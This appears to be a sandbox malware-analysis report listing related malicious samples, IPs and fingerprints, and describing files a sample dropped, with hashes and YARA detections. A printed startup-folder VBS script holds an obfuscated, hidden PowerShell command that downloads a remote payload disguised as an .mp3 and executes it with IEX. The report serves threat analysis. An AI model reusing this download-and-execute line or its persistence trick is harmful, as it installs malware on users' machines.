Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
gist.githubusercontent.com	invoicePDF.vbs	Get hash	malicious	Browse	185.199.108.133
	invoicePDF.vbs	Get hash	malicious	Browse	185.199.111.133
	Booking Confirmation 03092024951 - copy -PDF.exe	Get hash	malicious	Browse	185.199.110.133
	X7wAKzHEWd.exe	Get hash	malicious	Browse	185.199.108.133

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MILLENICOM-ASDE	gk2ZyyYyXt.exe	Get hash	malicious	Browse	95.173.249.152
	wP3TwzqN.exe	Get hash	malicious	Browse	46.1.54.174
	SZ2xmjnm.exe	Get hash	malicious	Browse	46.1.54.174
	REP er0005147.doc	Get hash	malicious	Browse	37.130.113.153
	iqgUi5vz.exe	Get hash	malicious	Browse	46.1.54.174
	xHzAwYc1.exe	Get hash	malicious	Browse	46.1.54.174
	gf58KqeK.exe	Get hash	malicious	Browse	46.1.54.174
	9GVm7REB.exe	Get hash	malicious	Browse	46.1.172.41
	OD29081792Y_COVID-19_SARS-CoV-2.doc	Get hash	malicious	Browse	37.130.113.153
	mssecsvr.exe	Get hash	malicious	Browse	46.1.72.142
HETZNER-ASDE	l5PW2UKLkw.dll	Get hash	malicious	Browse	188.40.137.206
	igMZrCyt4Q.dll	Get hash	malicious	Browse	188.40.137.206
	PU59F5roaG.dll	Get hash	malicious	Browse	188.40.137.206
	Q3KMmBoCpD.dll	Get hash	malicious	Browse	188.40.137.206
	exiMrBQk6v.dll	Get hash	malicious	Browse	188.40.137.206
	uS03ag763u.dll	Get hash	malicious	Browse	188.40.137.206
	TNA8CwIp4C.dll	Get hash	malicious	Browse	188.40.137.206
	8251Q778r4.dll	Get hash	malicious	Browse	188.40.137.206
	5NSbI8GXVU.dll	Get hash	malicious	Browse	188.40.137.206
	WI5pvc2Fqv.dll	Get hash	malicious	Browse	188.40.137.206
	kokvQi6t3N.exe	Get hash	malicious	Browse	195.201.225.248
	WjWbIV3832.dll	Get hash	malicious	Browse	188.40.137.206
	JKqDs8A3zR.dll	Get hash	malicious	Browse	188.40.137.206
	O3joAAm25q.dll	Get hash	malicious	Browse	188.40.137.206
	NQsFS0N9Fa.dll	Get hash	malicious	Browse	188.40.137.206
	uLC7Cfsd10.dll	Get hash	malicious	Browse	188.40.137.206
	JFkjmNAxpM.dll	Get hash	malicious	Browse	188.40.137.206
	GtCKOzvLVA.dll	Get hash	malicious	Browse	188.40.137.206
	BTtUVwHhpu.dll	Get hash	malicious	Browse	188.40.137.206
	eTA2l4bgZQ.dll	Get hash	malicious	Browse	188.40.137.206

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	g1pr13E0Pl.exe	Get hash	malicious	Browse	144.76.38.100
	SecuriteInfo.com.Trojan.GenericKD.36723138.25861.exe	Get hash	malicious	Browse	144.76.38.100
	New Purchase Order - VINEY2104A.exe	Get hash	malicious	Browse	144.76.38.100
	INV No. RDPLI2021-2111030.exe	Get hash	malicious	Browse	144.76.38.100
	CM264RSB.exe	Get hash	malicious	Browse	144.76.38.100
	FACTURA COMERCIAL____PDF____.exe	Get hash	malicious	Browse	144.76.38.100
	ENSQD5E2.exe	Get hash	malicious	Browse	144.76.38.100
	Updated PO attached.pdf.exe	Get hash	malicious	Browse	144.76.38.100
	6EQ3DSKB.exe	Get hash	malicious	Browse	144.76.38.100
	7F8x9ojxdZ.exe	Get hash	malicious	Browse	144.76.38.100
	DX9MzoM4vY.exe	Get hash	malicious	Browse	144.76.38.100
	867353735-2021 Presentation Details.vbs	Get hash	malicious	Browse	144.76.38.100
	aVzenPkPSm.exe	Get hash	malicious	Browse	144.76.38.100
	orden Q2.exe	Get hash	malicious	Browse	144.76.38.100
	9ml6pAYt9q.exe	Get hash	malicious	Browse	144.76.38.100
	wGHPo6j6hD.exe	Get hash	malicious	Browse	144.76.38.100
	payload.bat	Get hash	malicious	Browse	144.76.38.100
	playstation.exe	Get hash	malicious	Browse	144.76.38.100
	mOnadDr9KbAMgw6.exe	Get hash	malicious	Browse	144.76.38.100
	Ttcmb.exe	Get hash	malicious	Browse	144.76.38.100

Dropped Files

No context

Created / dropped Files

C:\ProgramData\conhost.exe Download File
Process:	C:\Users\user\AppData\Roaming\Ne - Copy.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	413832
Entropy (8bit):	6.180629624841485
Encrypted:	false
SSDEEP:	6144:kAv9cJIOBaXELMidx4T29riF4Vh29ib8IRUYJxlk8jC6MC51LyzTeh:xv9cCXnEKiyh9ibd5HjCdCDF
MD5:	FDBD7B1910D980CF7273796A0119D252
SHA1:	47029AF064A51454662909465CE38EE5CDCC62C7
SHA-256:	3E1DA2D14DE49132C42E8A4DDCEB5EFD36E066523AFFCC47DE6D175316AB0F4E
SHA-512:	AB43E5BA29134C62A8BEB000657F83B9471A64A839D3462C9625D059B5E259A75CDD27B2536150AE40931478384F6C13EF777756391CBE4CD9D95DE35B581170
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.k.%.k.%.k.%...$.k.%...$@k.%/..$.k.%/..$.k.%/..$.k.%...$.k.%...$.k.%.k.%.k.%o..$.k.%o.e%.k.%o..$.k.%Rich.k.%........................PE..d....n)`.........."..................2.........@..........................................`............................................................. .......\|)...4.................p.......................(...P...0...............(............................text............................... ..`.rdata..\|\|.......~..................@..@.data....E...0...(..................@....pdata..\|).......*...B..............@..@_RDATA...............l..............@..@.rsrc... ............n..............@..@.reloc...............(..............@..B................................................................................................................................................................................................

C:\ProgramData\conhost.exe.manifest Download File
Process:	C:\Users\user\AppData\Roaming\Ne - Copy.exe
File Type:	exported SGML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5505
Entropy (8bit):	5.85545827517348
Encrypted:	false
SSDEEP:	96:OKdKh9Jg2/qp8F9KaQrFk/1BEyRu0jMUJeVvh2zg4hdK+N9Z1uZH17E4NsWNw4X7:pKzJg2ANHkbRzjMMuvohdvN9SFNWMzX7
MD5:	DEA3D191F1D0F2A5BA924465A46ED502
SHA1:	25FA8DEDDB7F560E849ED60E0433A638C0CCA69C
SHA-256:	D628B76063BED997485067B40845AD2F24383D3F2936F94825603748543B1D5F
SHA-512:	DB300C40C5891A0B4B9E8DEE1ABC843AC6507F9972A06505F3ED4198513DC4B06541B544312A5CB540615AC3B5DB5D033709CDBA962F7F28209989AA3B8BEBF7
Malicious:	true
Preview:	<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">..<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">..<security>..<requestedPrivileges>..<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>..</requestedPrivileges>..</security>..</trustInfo>..</assembly>.. BEGIN_VBSEDIT_DATA..PHJvb3Q+DQo8c2lsZW50PnRydWU8L3NpbGVudD4NCjx0aW1lb3V0PjA8L3RpbWVv..dXQ+DQo8c2NyaXB0bmFtZT50YWhvby52YnM8L3NjcmlwdG5hbWU+DQo8YXBwbmFt..ZT5UYWhvbzwvYXBwbmFtZT4NCjxzY3JpcHQ+JyBDb2RlZCBieSB2X0IwMQ0KT24g..ZXJyb3IgcmVzdW1lIG5leHQNCg0KaiA9IGFycmF5KCJXU2NyaXB0LlNoZWxsIiwi..U2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiLCJTaGVsbC5BcHBsaWNhdGlvbiIs..Ik1pY3Jvc29mdC5YTUxIVFRQIikNCmcgPSBhcnJheSgiSEtDVSIsIkhLTE0iLCJI..S0NVXHZ3MHJtIiwiXFNvZnR3YXJlXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRW..ZXJzaW9uXFJ1blwiLCJIS0xNXFNPRlRXQVJFXENsYXNzZXNcIiwiUkVHX1NaIiwi..XGRlZmF1bHRpY29uXCIpDQp5PSBhcnJheSgid2lubWdtdHM6Iiwid2luMzJfbG9n..aWNhbGRpc2siLCJXaW4zMl9PcGVyYXRpbmdTeXN0ZW0iLCJ3aW5tZ210czpcXGxv..

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Microsoft Cabinet archive data, 58596 bytes, 1 file
Category:	dropped
Size (bytes):	58596
Entropy (8bit):	7.995478615012125
Encrypted:	true
SSDEEP:	1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
MD5:	61A03D15CF62612F50B74867090DBE79
SHA1:	15228F34067B4B107E917BEBAF17CC7C3C1280A8
SHA-256:	F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
SHA-512:	5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
Malicious:	false
Preview:	MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............\|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>..V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..\|0.+?.`-../.xvy..e......w.+^...w\|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g\|.z..+.D8.m..F .h............ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.112043626183269
Encrypted:	false
SSDEEP:	6:kKb/VywTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:TNywTJrkPlE99SNxAhUe0ht
MD5:	F1356A14566B0299B18B035A5D89EA66
SHA1:	921F0BA58A91E3C742CA5052CE9083F694D20337
SHA-256:	30207C68CC9657CED28EEB20F7565F22186FC62C1FC062C8D6295EFF2912D830
SHA-512:	6B2BBF7B0FAC7277460574AC98773916D1A03254B2D2916D415945A677AE84F700BFE526A24C78E09BDB6417CA46D08FF8014BDA125C8C1A3E32B265C35A0214
Malicious:	false
Preview:	p...... ..........Qu4..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xuXIetZvv6.exe.log Download File
Process:	C:\Users\user\Desktop\xuXIetZvv6.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.354940450065058
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5:	B10E37251C5B495643F331DB2EEC3394
SHA1:	25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256:	8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512:	296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	9709
Entropy (8bit):	4.925370375539915
Encrypted:	false
SSDEEP:	192:Axoe5FpOMxoe5Pib4GVsm5emdygkjDt4iWN3yBGHh9smidcU6CGdcU6CS9smDpOE:6fib4Glkjh4iUxs14r4Lib41
MD5:	37AED58F152582BDB058325D28DCC407
SHA1:	8D26BD9238E1BFD3BA661029D51C0E735CE29AE0
SHA-256:	52715A53B3D20A6510A4F97B6D20C69070A2BC0686BA1FF13E1E7BC5752EE2BA
SHA-512:	5ACC01C774A989714EBD956899334D327BB0C34C443DA1035275B209E793196AFC91ACC8A57D3E77EE935A2350CADC123F799AC00DC6D0DD9367DE31EA58131F
Malicious:	false
Preview:	PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	952
Entropy (8bit):	5.191780524239158
Encrypted:	false
SSDEEP:	24:3fPpQrLAo4KAxX5qRPD42HrCvKLoFe9t3ip:PPerB4nqRL/HrCvjFe9t3g
MD5:	BDFFA4CA0809F988CB0A07967641035A
SHA1:	8BF2512C9BD05EFF8A44B85C23FF0B4C8101362A
SHA-256:	8C73817389E03216EABDB6AEB4609350C5D071E38D917C21833C1B57C8E5AF85
SHA-512:	563757D1BEBC52EA715B3B2127B5B2AF51493C253D171B5D9D44D2C861BB4783F41C89C9616591C1DB15DEF41286EDD86EC9B4A43F2049ED85FFCCA92849C101
Malicious:	false
Preview:	@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..<................):gK..G...$.1.q........System.Configuration4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.`.......................................................".@.$.@.j.@...@...@...@...@...@.W.@.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kyi0x0v.yul.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnogimf1.h5q.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uv5m24xa.nma.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xu1qecit.fuw.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec Download File
Process:	C:\Windows\System32\certutil.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	322
Entropy (8bit):	6.200498073093925
Encrypted:	false
SSDEEP:	6:5jjQ/izIyNpJkCZ25nI65GjLVPG/4nQ6uHUQ/OhN953qi+lc:5jMn4Q5ndsfVM4n0hKqiac
MD5:	BEA3F19921218DF1AC5BA51EF108DE85
SHA1:	14B7DC87E78647D3E3D4ED2C6EEE3011EBA93A68
SHA-256:	0F8C6D5F7F0D7BF2B9807B43AB1B3E7A199BC9CB6D9E24768FBD9FFFF5119C0C
SHA-512:	4B26D86DA6A5F46733386D7D8AD6453CAE1605D5A781C9BEFB26A326542D1BD6D321E05B81DCB1CAA2ECD17B436C4D5E315F5D98AA69C377A10D7E72220C7C12
Malicious:	false
Preview:	PK.........t.Mr;.............localuse.xml#.CZ..[lfG.........9db....[..........X...efLV.#...2.m..#.e.#..........'/]........h.~.A....d.......6f5-.<WN.Q.^.;E^.+T......;.....y..t.3...PK..r;.........PK...........t.Mr;...........$....... .......localuse.xml.. ...........r'A....r'A...b..9...PK..........^.........

C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp Download File
Process:	C:\Windows\System32\cmd.exe
File Type:	PEM certificate
Category:	dropped
Size (bytes):	502
Entropy (8bit):	5.4831238552871495
Encrypted:	false
SSDEEP:	12:LroggIjPeuov89k4NWOliozA1BeyzLQjEbxfxC3QP:LrNJ+kWA4zLEU+A
MD5:	BDFCA84DA5BA5C5CF7248CB6F57D73FC
SHA1:	3C09E26230B406C200F18278C41AFC6BDE42EED5
SHA-256:	2952FF5907B110A1EE03DBDD29D50EC69425AF025BC6522FEDB3BD1FB19EC18A
SHA-512:	6FAED5B0CE62BD307D6EE73B1E3F23C41AC49CB2428F3A114D68026BAFF0A77FB7D5EB7C9B9BC7E49EA9746B5CDC7987E7E18F9B1676495ACDD1F32DF27841AB
Malicious:	false
Yara Hits:	Rule: SUSP_certificate_payload, Description: Detects payloads that pretend to be certificates, Source: C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp, Author: Didier Stevens, Florian Roth
Preview:	-----BEGIN CERTIFICATE-----..UEsDBBQACQAIAL10H01yO+XplAAAAK4AAAAMAAAAbG9jYWx1c2UueG1sI6tDWrDT..lltsZkfGove7mZqd2gDqOWRixOTOh8VblgLKDawe6MsXlFje7qeAs2VmTFaGI7gK..BDLSbS6QI6BljyPG8vemCeyO1hjXmocnL12fgP68iKnnrpCKaLp+w0GM7qwb+GSM..t66CpcPyNmY1Lf08V06dUbResjtFXs4rVNwcl4H4xDuGr7SN5HnpHHS0MwL+p1BL..BwhyO+XplAAAAK4AAABQSwECHwAUAAkACAC9dB9Ncjvl6ZQAAACuAAAADAAkAAAA..AAAAACAAAAAAAAAAbG9jYWx1c2UueG1sCgAgAAAAAAABABgAEfGNcidB1AER8Y1y..J0HUAR9iGB85uPkBUEsFBgAAAAABAAEAXgAAAM4AAAAAAA==..-----END CERTIFICATE-----..

C:\Users\user\AppData\Roaming\DVDFabPlayer5Activator.cmd Download File
Process:	C:\Users\user\Desktop\xuXIetZvv6.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3634
Entropy (8bit):	5.54186488266012
Encrypted:	false
SSDEEP:	48:cYMepRhoI8Bnh9Ex/R3R8fm0PZAI1tXxq2zORZORLzsmFvvuRuGYsif1P9pLPP9D:cteeI8hC/R3mt82c6v2RuTsuPPPkpC
MD5:	F4BF2BBAEE1287264FD210715BE2E558
SHA1:	EA0EFCB5FB67278DDC7AB162A1886BD2C88C04B9
SHA-256:	C8BE0D55178972EBDCDAF5977193708A00B245C51BA866D1F8944900236862E2
SHA-512:	9B789AD964A54031E396DAEE9AD6325F196482D69D6F69DC8E1B8535A994118CE3D72C8EB405DC0D3442D42971882152F56EC204D1E4BC4B011D6157FD2995CC
Malicious:	false
Yara Hits:	Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: C:\Users\user\AppData\Roaming\DVDFabPlayer5Activator.cmd, Author: Florian Roth
Preview:	@echo off..rem DVDFab Player 5.x Ultra Offline Activator (by xanax)..rem Activator Release Date: 2019-05-16....>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"....REM --> If error flag set, we do not have admin...if '%errorlevel%' NEQ '0' (.. echo Requesting administrative privileges..... goto UACPrompt..) else ( goto gotAdmin )....:UACPrompt.. echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs".. set params = %*:"="".. echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs".... "%temp%\getadmin.vbs".. del "%temp%\getadmin.vbs".. exit /B....:gotAdmin.. pushd "%CD%".. CD /D "%~dp0"....::remove if exist previous registration data from config.ini and leave intact other configuration settings..findstr /v "PC_UserName PC_Password" "%AppData%\DVDFab Player 5\config.ini" > "%AppData%\DVDFab Player 5\config.tmp"..del "%AppData%\DVDFab Player 5\config.ini"..ren "%AppData%\D

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe Download File
Process:	C:\ProgramData\conhost.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	413832
Entropy (8bit):	6.180629624841485
Encrypted:	false
SSDEEP:	6144:kAv9cJIOBaXELMidx4T29riF4Vh29ib8IRUYJxlk8jC6MC51LyzTeh:xv9cCXnEKiyh9ibd5HjCdCDF
MD5:	FDBD7B1910D980CF7273796A0119D252
SHA1:	47029AF064A51454662909465CE38EE5CDCC62C7
SHA-256:	3E1DA2D14DE49132C42E8A4DDCEB5EFD36E066523AFFCC47DE6D175316AB0F4E
SHA-512:	AB43E5BA29134C62A8BEB000657F83B9471A64A839D3462C9625D059B5E259A75CDD27B2536150AE40931478384F6C13EF777756391CBE4CD9D95DE35B581170
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.k.%.k.%.k.%...$.k.%...$@k.%/..$.k.%/..$.k.%/..$.k.%...$.k.%...$.k.%.k.%.k.%o..$.k.%o.e%.k.%o..$.k.%Rich.k.%........................PE..d....n)`.........."..................2.........@..........................................`............................................................. .......\|)...4.................p.......................(...P...0...............(............................text............................... ..`.rdata..\|\|.......~..................@..@.data....E...0...(..................@....pdata..\|).......*...B..............@..@_RDATA...............l..............@..@.rsrc... ............n..............@..@.reloc...............(..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe.manifest Download File
Process:	C:\Users\user\AppData\Roaming\Ne - Copy.exe
File Type:	MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	104
Entropy (8bit):	2.0029150678189045
Encrypted:	false
SSDEEP:	3:4xtllv6l8lQFq3kNPJ//:4xtal0QqSX
MD5:	5668661647CFF279A304DE1B9FAAF939
SHA1:	EEEB75D90E00DE24B92F99FE65CF0E990F7083C2
SHA-256:	7D7C8EB27DA7F439668BA7090CCD20DD9C3FC751157DEDC4961915468BE4383D
SHA-512:	9FC3A5B8BFE5ECB5BFA0FD5A12BE11DC8DF5FEC6D3C4DA53553A8CA64567107CBD0AF069E0D288EC2B24B554B46141CE23B8C441B94DF7285207CD824259BAFF
Malicious:	true
Preview:	L..................F.............................................................P.O. .:i.....+00.......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1607
Entropy (8bit):	5.688632869348016
Encrypted:	false
SSDEEP:	24:eu5rqaqDuH46zJajAtwn6U+uJ2z+fLAW7xmWAWSHtyQKnr6MfMG3zrqESYKn7kOd:euqp6zAgMrXUYLAGoHTKWMkyXjlm
MD5:	95433F3A8DE55D26DDF7864FE9CDE527
SHA1:	2F10DD935C890E89ABFC16E9D959CA6163FD8BB6
SHA-256:	F63C9B2F961F0242F3D00D453A880DF93C944125A57BB82942913A4527E5DE49
SHA-512:	32FDD2B102F6A3DFE13A9FCB985B62B195B0EB0815959FC4D9CE3817451DA2D0B03ECF4D186409694F0B49842E84207E638FC838C90009D39A1CC822451D4334
Malicious:	true
Yara Hits:	Rule: Molerats_Jul17_Sample_5, Description: Detects Molerats sample - July 2017, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs, Author: Florian Roth Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs, Author: Joe Security
Preview:	const CONSOLE_HIDE=0..const CONSOLE_SHOW=1..const CMD_WAIT=true..Dim objShell..Set objShell = CreateObject("WScript.Shell")..set oShell1 = wscript.createObject("WScript.Shell")..fl=Wscript.scriptfullname..sn=Wscript.scriptname..C=chr(30+30+5+5+10) &"owershell -ExecutionPolicy Bypass -windowstyle hidden -Command "..objShell.Run C & chrw(34) & "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\"&sn&"',[System.IO.File]::ReadAllText('"&fl&"'))" & Chrw(34),0,false....oShell1.run chr(30+30+5+5+10) +"owershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa", CONSOLE_HIDE, CMD_WAIT....Dim shell,com..sLPgPFAyS=chr(80) +"ow"

C:\Users\user\AppData\Roaming\Ne - Copy.exe Download File
Process:	C:\Users\user\Desktop\xuXIetZvv6.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1732096
Entropy (8bit):	6.36461193291454
Encrypted:	false
SSDEEP:	49152:PssWIfbHO+7DGBtAJSKBw3NMuykVtknnfSYVIW+cC31c:PsxIfbItAPBw3NMxkKnfZic
MD5:	A4A1FA7769DF7C47A6D69FB66AA1EB30
SHA1:	BBCEC5F1976CE639EACEE23AEBCE966C3DEBE111
